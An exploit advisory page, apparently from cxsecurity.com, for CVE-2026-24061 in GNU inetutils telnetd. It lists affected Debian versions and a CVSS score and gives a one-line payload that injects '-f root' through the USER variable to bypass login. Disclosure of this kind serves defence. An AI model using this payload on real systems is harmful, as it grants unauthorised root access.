Telnet Argument Injection Privilege Escalation - RCE

2026.01.25
Credit: nu11secur1ty
Risk: High
Local: No
Remote: Yes
CVE: CVE-2026-24061
CWE: N/A

# Titles: Telnet Argument Injection Privilege Escalation - RCE # Author: nu11secur1ty # Date: 1/24/2026 # Vendor: https://www.gnu.org/software/inetutils/ # Software: https://www.gnu.org/software/inetutils/ # Reference: https://nsfocusglobal.com/gnu-inetutils-telnetd-remote-authentication-bypass-vulnerability-cve-2026-24061-notice/ # CVE-2026-24061 ## Description: Argument/Command Injection via the USER environment variable in the inetutils telnet client (version 1.9-4+deb10u2 and earlier). The client improperly passes the USER environment variable contents as command-line arguments to the telnet daemon (telnetd). STATUS: CRITICAL ## Affected Versions: - inetutils-telnet 1.9-4+deb10u2 and earlier - Debian 10 (buster) and derivatives - Possibly other distributions with similar versions # Attack Vector: Network/Adjacent (requires telnet access) CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) [+]Payload: ``` USER="-f root" telnet -a 127.0.0.1 2323 ``` # Demo: [href](https://www.patreon.com/posts/telnet-argument-148994220) # Time spent: 00:01:35 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top